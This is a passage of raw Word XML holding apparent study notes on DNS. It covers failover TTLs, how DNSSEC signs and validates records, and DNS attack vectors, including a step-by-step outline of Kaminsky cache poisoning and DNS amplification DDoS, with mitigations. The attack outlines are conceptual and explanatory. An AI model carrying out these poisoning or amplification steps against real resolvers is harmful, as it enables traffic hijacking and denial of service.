    <w:p w14:paraId="6EA4D535" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If an IP fails health checks, it's removed from DNS responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494322A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>When it recovers, it's added back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04553BEB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>TTLs are kept short (60 seconds) to ensure rapid failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E864DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Limitation: Even with TTL=60, some clients may cache the old IP for the full TTL. DNS failover is not instantaneous — it's "eventually consistent" failover with a lag of seconds to minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272387D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="1B11D8AB">
          <v:rect id="_x0000_i3176" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE1B2F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. DNSSEC — Cryptographic Integrity for DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239592A6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS was designed with no authentication. Any resolver along the chain can </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lie</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> about DNS responses (DNS spoofing/cache poisoning). DNSSEC adds </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cryptographic signatures</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> to DNS records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27A31A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How DNSSEC Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A8EA25" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Chain of Trust:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B7525" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNSSEC establishes a chain of cryptographic trust from the root down to individual zones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39CEE7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C3522D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Root zone signs .com zone's keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40347585" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">  .com zone signs github.com zone's keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D3BBE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    github.com zone signs its own records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4039CC5A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04617ADB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ZSK (Zone Signing Key):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Signs individual resource records within a zone. Rotated frequently (monthly) for security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2D516" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KSK (Key Signing Key):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Signs the ZSK. Rotated less frequently (annually). Its fingerprint (DS record) is registered with the parent zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A5894E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Record Types Added by DNSSEC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9146C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RRSIG (Resource Record Signature):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A cryptographic signature over an RRset. Stored alongside each signed RRset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36555181" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02249C75" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>www.github.com.  60  IN  A  140.82.121.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192D8C5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>www.github.com.  60  IN  RRSIG  A 8 3 60 [expiry] [signed] [keytag] github.com. [signature]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992D41D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSKEY:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The public key used to verify RRSIG signatures. Published in the zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E01F25" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DS (Delegation Signer):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A hash of the child zone's KSK, published in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parent zone</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. The github.com DS record is stored in the .com zone. This creates the cryptographic link between parent and child zones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117BAA4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSEC/NSEC3 (Next Secure):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proves </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-existence</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> of a name (authenticated denial of existence). Without this, an attacker could respond "that domain doesn't exist" with no way to verify. NSEC lists the next existing name alphabetically — proving the queried name doesn't exist between two real names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FE424" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>NSEC3 is the privacy-preserving variant — uses hashed names instead of plain names, preventing </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zone enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (walking the NSEC chain to discover all names in a zone).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C02C9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Validation Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C86AF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A DNSSEC-validating resolver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E47C6E2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Receives an A record + RRSIG for www.github.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5A7BE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Fetches the DNSKEY for github.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820DD1F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Verifies the RRSIG against the DNSKEY — </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>validates the A record</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFB17A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Fetches the DS record for github.com from the .com zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD85D2E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Verifies the DNSKEY matches the DS hash — </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>validates github.com's key</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B689A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Fetches .com's DNSKEY, validates it against the root's DS record for .com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968D34E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Validates root zone's DNSKEY against the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hardcoded root trust anchor</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (a public key distributed with the OS/resolver software).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F3EBD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The root trust anchor is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ultimate trust root</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — it's hardcoded in resolvers and updated via RFC 5011 automatic trust anchor updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D96A59D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSSEC Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C406A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Doesn't encrypt queries</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — only signs them. Queries are still plaintext. (That's DoT/DoH's job)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09200E2F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Zone signing, key rotation, and DS record updates at the parent zone require careful orchestration. A failed key rotation can </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>break your entire domain</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCD53A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="608"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amplification attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> DNSSEC responses are large (cryptographic signatures). Attackers use DNS reflection + amplification — sending queries with spoofed source IPs, causing nameservers to send large DNSSEC responses to victims. DNSSEC dramatically worsens this attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261CD5BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="16B1D052">
          <v:rect id="_x0000_i3177" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B404199" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. DNS Attack Vectors — Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B215C2E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Poisoning (Kaminsky Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA2322" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The most famous DNS attack, discovered by Dan Kaminsky in 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082A1B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E821B68" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attacker wants to poison the resolver's cache for bank.com → attacker's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50623448" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attacker sends many queries to the resolver for non-existent subdomains: aaa.bank.com, aab.bank.com, etc. Each triggers a resolution chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C88C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Simultaneously, attacker floods the resolver with </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forged responses</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> for bank.com, each guessing a different transaction ID (16-bit field = 65,536 possibilities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9841E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If a forged response arrives </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>before the real authoritative response</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> and the transaction ID matches → cache is poisoned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12257F02" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Now all clients using this resolver get the attacker's IP for bank.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438630C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it was critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Pre-Kaminsky, resolvers used predictable transaction IDs and source ports. Kaminsky's insight was that you don't need to poison the exact queried subdomain — the forged response includes additional records for the parent domain (bank.com), which gets cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E099C28" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B872EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source port randomization:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Use a random source port for each query (adds ~16 more bits of entropy on top of the 16-bit transaction ID → 2^32 combinations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D4051" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x20 encoding (capitalization randomization):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Encode domain queries with random capitalization (bAnK.cOm). Authoritative servers must preserve capitalization in responses. Forged responses that don't match the exact capitalization are rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49393DF0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DNSSEC:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The proper cryptographic fix — poisoned records fail signature validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A0A36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Amplification DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00369449" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>perfect amplification vector</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E35FC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Small query (40–60 bytes) → large response (hundreds to thousands of bytes with DNSSEC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD4189" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Amplification factor: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10x–100x</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24280581" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attacker spoofs victim's IP as query source → nameserver floods victim with large responses.</w:t>
      </w:r>
    </w:p>
